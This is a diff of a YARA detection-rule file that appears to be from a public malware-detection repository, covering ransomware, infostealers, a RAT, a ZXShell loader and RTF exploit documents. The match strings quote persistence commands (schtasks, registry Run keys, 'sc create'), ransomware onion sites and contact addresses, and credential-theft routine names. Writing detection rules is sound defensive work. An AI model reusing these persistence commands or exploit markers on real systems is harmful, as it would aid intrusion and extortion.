+		$s1 = "<title>SurtrRansomware</title>" ascii
+		$s2 = "<HTA:APPLICATION ID=\"SurtrRansomware\"" ascii
+		$s3 = "APPLICATIONNAME=\"SurtrRansomware\"" ascii
+		$s4 = "src=\"data:image/jpeg; base64,/9j/4AAQSkZJRgABAQEAYABgAAD/2wCEAAgICAgJCAkKCgkNDgwODRMREBARExwUFhQWFBwrGx8bGx8bKyYuJSMlLiZENS8v" ascii
+		$s5 = "4rbgxisigb4pxnloxzc265rmzaj7fslrhyouegtrph2a7xhh55r6xaid.onion" ascii
+		$s6 = "schtasks /CREATE /SC ONLOGON /TN svchos" wide
+		$s7 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v \"svchos" ascii
+		$s8 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ /v \"svchos" ascii
+		$s9 = "SURTR_README.txt" wide
+		$s10 = "surtr-decrypt.top" ascii
+		$s11 = /(Public|Private|ID)_DATA\.surt/ wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Payola
+rule DITEKSHEN_MALWARE_Win_Udprat : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Payola ransomware"
-		author = "ditekShen"
-		id = "7c1fc06b-fc71-5679-befd-686b2e05e3a4"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects UDPRat"
+		author = "ditekSHen"
+		id = "938fc9fd-4f08-5c23-8583-06083d2efe59"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1699-L1708"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9380-L9395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "568141c03d14faef0cfc4f5fbdec45a5109a1ad5cbbe99e76a1db86e7ef4dc5d"
+		logic_hash = "4606b304d179148c6e44a0a8329675f2823f862a0944284cb646e5910659ea7c"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "pcsupport@skiff.com" ascii wide nocase
-		$s2 = "pctalk01@tutanota.com" ascii wide nocase
+		$s1 = "\\code\\UDP\\Client\\" ascii
+		$s2 = "ssdp:discover" ascii
+		$s3 = ": Device:" ascii
+		$s4 = "for the SNMP U encountered" ascii
+		$s5 = "privat:InternetGatewayelink" fullword ascii
+		$s6 = "schemas A jet error was" ascii
+		$s7 = "msidentity" fullword ascii
+		$s8 = "microsoftonliser-based Securi" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Xorist
+rule DITEKSHEN_MALWARE_Win_Jesterstealer : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Xorist ransomware"
-		author = "ditekShen"
-		id = "151d182c-c60a-54dd-a3d2-b32d27521b57"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects JesterStealer"
+		author = "ditekSHen"
+		id = "7b07061f-97a4-5158-8084-46ccf212f6be"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1710-L1723"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9397-L9417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5975a730ad1a1f7e54e95ec5897aa2940ccc3ed1aa8e83b38cb7ac836c233208"
+		logic_hash = "c84df5d3ad2bc7a75a11c07995cc034c2a92b2f6f6f6943288add9c44c57bf6d"
 		score = 75
-		quality = 67
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "@root_backdoor_synaptics_V" ascii wide nocase
-		$s2 = "@DosX_Plus" ascii wide nocase
-		$s3 = "@Cinoshi_Adm" ascii wide nocase
-		$s4 = "@ac3ss0r" ascii wide nocase
-		$s5 = "MCwRK1Z7K4GYHt9ZrbTR2SMCEqzqQaTbRF" ascii wide
-		$s6 = "0x334F093c9De6552AF4cC0B252dA82aC77FeB467D" ascii wide
+		$s1 = /\[(Credman|Networks|Screenshot|Vault)\]\s\{0\}/ fullword wide
+		$s3 = "encoding=\"base64\"" fullword wide
+		$s4 = "/json/list" fullword wide
+		$s5 = "/L1ghtM4n/TorProxy/" ascii wide
+		$s6 = "<EnumerateCredentials>" ascii
+		$s7 = "<EnumerateBrowsers>" ascii
+		$s8 = "<PerformSelfDestruct>" ascii
+		$s9 = "<get_GrabberCount>" ascii
+		$s10 = "AnalyzeData" fullword ascii
+		$s11 = "CheckCard" fullword ascii
+		$s12 = "CreateGrabberZipPath" fullword ascii
+		$s13 = "Jester" fullword ascii
+		$s14 = /Stealer\.(Recovery|Grabber|Investigation)\./ ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackhunt
+rule DITEKSHEN_MALWARE_Win_Soranostealer : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with BlackHunt ransomware"
-		author = "ditekShen"
-		id = "87613fcc-7d9a-57ba-9653-c48760dd5ef0"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects SoranoStealer / HogGrabber. Available on Github: /Alexuiop1337/SoranoStealer"
+		author = "ditekSHen"
+		id = "2fc40a73-5f28-5b5c-938a-35e8336e1d11"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1725-L1739"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9419-L9443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b875d4abdedc8032f89ab3cbdf4acdc855d83b5bcc08f96b2fbc38b4a5daa7f"
+		logic_hash = "27c9d6bf3f40f3d41c35975e856671fafcd4a0a8143b3bcbdff61c1fb28a37ab"
 		score = 75
-		quality = 61
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "onion746@onionmail.com" ascii wide nocase
-		$s2 = "amike1096@gmail.com" ascii wide nocase
-		$s3 = "decryptyourdata@msgsafe.io" ascii wide nocase
-		$s4 = "decryptyourdata@onionmail.org" ascii wide nocase
-		$s5 = "Teikobest@gmail.com" ascii wide nocase
-		$s6 = "Loxoclash@gmail.com" ascii wide nocase
-		$s7 = "://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion" ascii wide nocase
+		$x1 = "OiCuntJollyGoodDayYeHavin_" ascii
+		$x2 = { 00 56 4d 50 72 6f 74 65 63 74 00 52 65 61 63 74
+                6f 72 00 64 65 34 66 75 63 6b 79 6f 75 00 42 61
+                62 65 6c 4f 62 66 75 73 63 61 74 6f 72 41 74 74
+                72 69 62 75 74 65 00 43 72 79 74 70 6f 4f 62 66
+                75 73 63 61 74 6f 72 00 }
+		$x3 = { 00 4f 62 66 75 73 63 61 74 65 64 42 79 47 6f 6c
+                69 61 74 68 00 42 65 64 73 2d 50 72 6f 74 6f 72 00 }
+		$s1 = ".Binaries.whysosad" ascii
+		$s2 = "Adminstrator permissons are required" wide
+		$s3 = "12:03:33:4A:04:AF" fullword wide
+		$s4 = "RemoveEXE" fullword ascii
+		$s5 = "$340becfa-1688-4c32-aa49-30fdb4005e4b" fullword ascii
+		$s6 = "$99cffbcc-6ad7-4d32-bd1f-450967cf4a6b" fullword ascii
+		$s7 = "\"cam\": " ascii
+		$s8 = " - 801858595527371999762718088" fullword ascii
+		$s9 = "  - 96188142294460126639341306" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_0199_1 : CVE_2017_0199 FILE
+rule DITEKSHEN_MALWARE_Win_Gloomanestealer : FILE
 {
 	meta:
-		description = "Detects RTF documents potentially exploiting CVE-2017-0199"
+		description = "Detects GloomaneStealer"
 		author = "ditekSHen"
-		id = "74b3702a-7b4d-58be-ad2c-c2b1cf0ebc50"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "6e3c7e8f-4b75-5198-aa41-076f29aac227"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L1-L69"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9445-L9461"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "06b75267f00b775a6c1cd7a2022a9cfa0ea2c976f969c2c066be51449f197f58"
+		logic_hash = "36aa9f863efb8172ed6449932169e6cb26cdeedd84bc734e09a8116a9c7774ac"
 		score = 75
 		quality = 75
-		tags = "CVE-2017-0199, FILE"
+		tags = "FILE"
 
 	strings:
-		$urlmoniker3 = { 45 0a 30 0a 43 0a 39 0a 45 0a 41 0a 37 0a 39 0a
-                         46 0a 39 0a 42 0a 41 0a 43 0a 45 0a 31 0a 31 0a
-                         38 0a 43 0a 38 0a 32 0a 30 0a 30 0a 41 0a 41 0a
-                         30 0a 30 0a 34 0a 42 0a 41 0a 39 0a 30 0a 42 }
-		$urlmoniker4 = { 45 0d 0a 30 0d 0a 43 0d 0a 39 0d 0a 45 0d 0a 41
-                         0d 0a 37 0d 0a 39 0d 0a 46 0d 0a 39 0d 0a 42 0d
-                         0a 41 0d 0a 43 0d 0a 45 0d 0a 31 0d 0a 31 0d 0a
-                         38 0d 0a 43 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
-                         0d 0a 41 0d 0a 41 0d 0a 30 0d 0a 30 0d 0a 34 0d
-                         0a 42 0d 0a 41 0d 0a 39 0d 0a 30 0d 0a 42 }
-		$urlmoniker6 = { 65 0a 30 0a 63 0a 39 0a 65 0a 61 0a 37 0a 39 0a
-                         66 0a 39 0a 62 0a 61 0a 63 0a 65 0a 31 0a 31 0a
-                         38 0a 63 0a 38 0a 32 0a 30 0a 30 0a 61 0a 61 0a
-                         30 0a 30 0a 34 0a 62 0a 61 0a 39 0a 30 0a 62 }
-		$urlmoniker7 = { 65 0d 0a 30 0d 0a 63 0d 0a 39 0d 0a 65 0d 0a 61
-                         0d 0a 37 0d 0a 39 0d 0a 66 0d 0a 39 0d 0a 62 0d
-                         0a 61 0d 0a 63 0d 0a 65 0d 0a 31 0d 0a 31 0d 0a
-                         38 0d 0a 63 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
-                         0d 0a 61 0d 0a 61 0d 0a 30 0d 0a 30 0d 0a 34 0d
-                         0a 62 0d 0a 61 0d 0a 39 0d 0a 30 0d 0a 62 }
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31" ascii nocase
-		$ole5 = { 64 0a 30 0a 63 0a 66 0a 31 0a 31 0a 65 0a 30 }
-		$ole6 = { 64 0d 0a 30 0d 0a 63 0d 0a 66 0d 0a 31 0d 0a 31 0d 0a 65 0d 0a 30 }
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
+		$x1 = "=GLOOMANE STEALER=" wide
+		$x2 = "Maded by GLOOMANE" wide
+		$s1 = "\\44CALIBER" ascii
+		$s2 = "Ethernet()" fullword wide
+		$s3 = ":spy: NEW LOG FROM" wide
+		$s4 = ":eye: IP:" wide
+		$s5 = ":file_folder: Grabbed Files" wide
+		$s6 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
+		$s7 = "$3b0e2d3d-3d66-42bb-8f9c-d6e188f359ae" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $urlmoniker* ) and 1 of ( $ole* ) and 1 of ( $obj* )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_1 : CVE_2017_8759 FILE
+rule DITEKSHEN_MALWARE_Win_Lockdown : FILE
 {
 	meta:
-		description = "detects CVE-2017-8759 weaponized RTF documents."
+		description = "Detects Lockdown / cantopen ransomware"
 		author = "ditekSHen"
-		id = "8f873145-b909-5185-9f85-07c820d1f38e"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "793df99d-016a-5f96-9ff9-76d3f08e0dd2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L215-L238"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9463-L9476"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "595dc0153a2349fbd4f92dd544a3dfd05715059dd639653e7c7e6ac80624360e"
+		logic_hash = "a9bc2f514730703f3edf78a61f1bc357eee12b3289fc7491197c3b885286ca7e"
 		score = 75
-		quality = 75
-		tags = "CVE-2017-8759, FILE"
+		quality = 73
+		tags = "FILE"
 
 	strings:
-		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$clsid2 = { 00 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$clsid3 = "0003000000000000c000000000000046" ascii nocase
-		$clsid4 = "4f4c45324c696e6b" ascii nocase
-		$clsid5 = "OLE2Link" ascii nocase
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$s1 = "wsdl=http" wide
-		$s2 = "METAFILEPICT" ascii
-		$s3 = "INCLUDEPICTURE \"http" ascii
-		$s4 = "!This program cannot be run in DOS mode" ascii
+		$s1 = "BgIAAACkAABSU0E" wide
+		$s2 = ".cantopen" fullword wide
+		$s3 = "\\HELP_DECRYPT_YOUR_FILES.txt" wide
+		$s4 = "SALT" fullword wide
+		$s5 = "$4e677664-9a63-458e-a365-deb792509557" fullword ascii
+		$s6 = "CreateEncryptor" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 : CVE_2017_8759 FILE
+rule DITEKSHEN_MALWARE_Win_Unamedstealer : FILE
 {
 	meta:
-		description = "detects CVE-2017-8759 weaponized RTF documents."
+		description = "Detects unknown infostealer. Observed as 2nd stage and injects into .NET AppLaunch.exe"
 		author = "ditekSHen"
-		id = "92c8f45e-3792-51b3-bda4-7e9eae0e9a80"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "cb3d575b-3d53-5b89-abc1-3b3857ec9f46"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L240-L268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9478-L9494"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15c9a5cfce5d1a797bab049352d8506b8bc112cabe2f510019f5d203690419e8"
+		logic_hash = "84f4ac7489a0d522763f69ce55f816642a8511dc4b9698ce47c983020a2b7bea"
 		score = 75
 		quality = 75
-		tags = "CVE-2017-8759, FILE"
+		tags = "FILE"
 
 	strings:
-		$clsid1 = { 88 d9 6a 0c f1 92 11 d4 a6 5f 00 40 96 32 51 e5 }
-		$clsid2 = "88d96a0cf19211d4a65f0040963251e5" ascii nocase
-		$clsid3 = "4d73786d6c322e534158584d4c5265616465722e" ascii nocase
-		$clsid4 = "Msxml2.SAXXMLReader." ascii nocase
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\objclass htmlfile" ascii
-		$soap1 = "c7b0abec197fd211978e0000f8757e" ascii nocase
+		$s1 = "HideMelt" fullword ascii
+		$s2 = ".Implant" ascii
+		$s3 = "SetUseragent" fullword ascii
+		$s4 = "SendReport" fullword ascii
+		$s5 = "cookiesList" fullword ascii
+		$s6 = "WriteAppsList" fullword ascii
+		$s7 = "Timeout /T 2 /Nobreak" fullword wide
+		$s8 = "Directory not exists" wide
+		$s9 = "### {0} ### ({1})" wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and ( 2 of ( $obj* ) or 1 of ( $soap* ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Exploit_Scripting : CVE_2017_8759 CVE_2017_8570 FILE
+
+rule DITEKSHEN_MALWARE_Win_Zxshell_Loader : FILE
 {
 	meta:
-		description = "detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents."
+		description = "Detects ZXShell kernel driver loader"
 		author = "ditekSHen"
-		id = "e8fd1231-3ef5-5b0b-987c-f55337804da3"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "c55c718b-6af3-5d3b-aa1c-369319fca603"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L270-L302"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9496-L9544"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1f4c833f0132dcbe2b3677d6ac0f3597c152702515375d60d4332c21183bd76"
+		logic_hash = "b20350af231e0c329423c71d8f099305ed447d2ffcb7a533b7531dc9f5357b93"
 		score = 75
-		quality = 75
-		tags = "CVE-2017-8759, CVE-2017-8570, FILE"
+		quality = 57
+		tags = "FILE"
+		hash1 = "a6020794bd6749e0765966cd65ca6d5511581f47cc2b38e41cb1e7fddaa0b221"
 
 	strings:
-		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$clsid2 = "0003000000000000c000000000000046" ascii nocase
-		$clsid3 = "4f4c45324c696e6b" ascii nocase
-		$clsid4 = "OLE2Link" ascii nocase
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
-		$ole6 = "D0cf11E" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
-		$obj8 = "\\objclass htmlfile" ascii
-		$sct1 = { 33 (43|63) (3533|3733) (3433|3633) (3532|3732) (3439|3639)( 3530|3730) (3534|3734) (3443|3643) (3435|3635) (3534|3734) }
-		$sct2 = { (3737|3537) (3733|3533) (3633|3433) (3732|3532) (3639|3439) (3730|3530) (3734|3534) (3245|3265) (3733|3533) (3638|3438) (3635|3435) (3643|3443) (3643|3443) }
+		$s1 = "KillAvpProcess" ascii wide nocase
+		$s2 = "ProtectDllFile" ascii wide nocase
+		$s3 = "LoadSys" ascii wide nocase
+		$s4 = "CallDriver" ascii wide nocase
+		$s5 = "DoRVA" fullword ascii wide
+		$s6 = "TdiProxy" ascii
+		$s7 = "res.ini" fullword ascii
+		$s8 = "res.dat" fullword ascii
+		$s9 = "google64.p" fullword ascii
+		$s10 = "google32.p" fullword ascii
+		$s11 = "OneSelfKey" fullword ascii
+		$x1 = "antiscan" ascii
+		$x2 = "removeprocessnotify" ascii
+		$x3 = "setprocessnotify" ascii
+		$x4 = "antiantigp" ascii
+		$x5 = "hideproc" ascii
+		$x6 = "hidekey" ascii
+		$x7 = "hidefile" ascii
+		$x8 = "sc create %s binpath= \"%%SystemRoot%%\\System32\\svchost.exe -k %s\" type= share start= auto" fullword ascii
+		$m1 = "St4rtServ1ce" ascii
+		$m2 = "ch3ck dr1ver failed" ascii
+		$m3 = "L0ad dr1ver failed" ascii
+		$m4 = "Write Dr1ver Failed" ascii
+		$m5 = "over writed succ3ssfully" ascii
+		$m6 = "can k1ll the pr0cessId" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 1 of ( $obj* ) and 1 of ( $sct* )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $m* ) or 5 of ( $s* ) or 5 of ( $x* ) or ( 3 of ( $s* ) and 3 of ( $x* ) ) or ( 2 of ( $s* ) and 1 of ( $x* ) and 1 of ( $m* ) ) or ( pe.exports ( "KillAvpProcess" ) and pe.exports ( "ProtectDllFile" ) and pe.exports ( "LoadSys" ) ) or ( 3 of them and ( pe.exports ( "KillAvpProcess" ) or pe.exports ( "ProtectDllFile" ) or pe.exports ( "LoadSys" ) or pe.exports ( "CallDriver" ) or pe.exports ( "DoRVA" ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Sheetmacroenabled : FILE
+rule DITEKSHEN_MALWARE_Win_Bandit : FILE
 {
 	meta:
-		description = "Detects RTF documents embedding an Excel sheet with macros enabled. Observed in exploit followed by dropper behavior"
+		description = "Detects Bandit Infostealer"
 		author = "ditekSHen"
-		id = "342d10b3-61d2-5fcb-8f4f-1fe45049257b"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "06866232-bd40-5bbc-9f08-3892193b5f36"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L304-L328"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9546-L9582"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc3b52e549c2697c6e0a2fea365d193311d90d26854bd2fe321aa26c118975a0"
+		logic_hash = "e557f5a928b5da90f3ec878d6d8615a2d8b5f33e97954cd3278044f76b543386"
 		score = 75
-		quality = 75
+		quality = 32
 		tags = "FILE"
 
 	strings:
-		$ex1 = "457863656c2e53686565744d6163726f456e61626c65642e" ascii nocase
-		$ex2 = "0002083200000000c000000000000046" ascii nocase
-		$ex3 = "Excel.SheetMacroEnabled." ascii
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$x1 = "@Banditshopbot" ascii
+		$x2 = "BANDIT STEALER" ascii
+		$x3 = "Banditstealer" ascii
+		$n1 = "bandit/browsers." ascii
+		$n2 = "bandit/crypto." ascii
+		$n3 = "bandit/decrypt." ascii
+		$n4 = "bandit/messenger." ascii
+		$n5 = "bandit/userdata." ascii
+		$n6 = "bandit/utils." ascii
+		$f1 = "main.sendZipToTelegram" fullword ascii
+		$f2 = "main.killProcessHoldingFileHandle" fullword ascii
+		$f3 = "main.killProcessByName" fullword ascii
+		$f4 = "main.killProcessesHoldingFile" fullword ascii
+		$f5 = "main.deleteDir" fullword ascii
+		$f6 = "main.deleteUserDataDirs" fullword ascii
+		$path = /bandit\/(browsers|common|crypto|messenger|userdata|utils)\/(browsers|common|crypto|messenger|userdata|utils)\.go/ ascii
+		$m1 = "banditbot" ascii wide nocase
+		$m2 = "blackListedIPS = [" ascii wide nocase
+		$m3 = "blackListedPCNames = [" ascii wide nocase
+		$m4 = "blackListedMacs = [" ascii wide nocase
+		$m5 = "blacklisted_hwids = [" ascii wide nocase
+		$m6 = "blacklisted_users = [" ascii wide nocase
+		$m7 = "blacklisted_processes = [" ascii wide nocase
+		$s1 = "User-AgentVirtualBox" ascii
+		$s2 = "%s%sBinanceChainWallet" ascii
+		$s3 = "coinbaseWalletcontent-lengthdata" ascii
+		$s4 = "coinbaseWalletExtensioncommand" ascii
+		$s5 = "\\s+pid:\\s+(\\d+)\\s+" ascii
+		$s6 = "/user:Administrator" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( 1 of ( $ex* ) and 1 of ( $ole* ) and 2 of ( $obj* ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $n* ) or 5 of ( $f* ) or ( $path and ( 1 of ( $n* ) or 1 of ( $f* ) ) ) or ( 1 of ( $x* ) and ( 1 of ( $n* ) or 1 of ( $f2* ) ) ) or 6 of ( $m* ) or ( all of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Metadatacmd : FILE
+rule DITEKSHEN_MALWARE_Win_Laplas : FILE
 {
 	meta:
-		description = "Detects OLE documents with Windows command-line utilities commands (certutil, powershell, etc.) stored in the metadata (author, last modified by, etc.)."
+		description = "Detects LapLas Infostealer"
 		author = "ditekSHen"
-		id = "63b23630-b344-5fba-95f4-950d072beaff"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "bf2b0183-2b21-535a-896c-250fa448d090"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L330-L349"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9584-L9612"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0562d026a1ad4510310ebff5da154064f92afc7bf714973f7de362435476772c"
+		logic_hash = "e4a1f39a539782118db9c4ab89d03e359420397ef970165389cc79e7ea0952b3"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
+		clamav_sig1 = "MALWARE.Win.LapLas-DotNET"
+		clamav_sig2 = "MALWARE.Win.LapLas-GoLang"
 
 	strings:
-		$cmd1 = { 00 1E 00 00 00 [1-4] 00 00 (63|43) (6D|4D) (64|44) (00|20) }
-		$cmd2 = { 00 1E 00 00 00 [1-4] 00 00 (6D|4D) (73|53) (68|48) (74|54) (61|41) (00|20) }
-		$cmd3 = { 00 1E 00 00 00 [1-4] 00 00 (77|57) (73|53) (63|43) (72|52) (69|49) (70|50) (74|54) (00|20) }
-		$cmd4 = { 00 1E 00 00 00 [1-4] 00 00 (63|42) (65|45) (72|52) (74|54) (75|55) (74|54) (69|49) (6C|4C) (00|20) }
-		$cmd5 = { 00 1E 00 00 00 [1-4] 00 00 (70|50) (6F|4F) (77|57) (65|45) (72|52) (73|43) (68|48) (65|45) (6C|4C) (6C|4C) (00|20) }
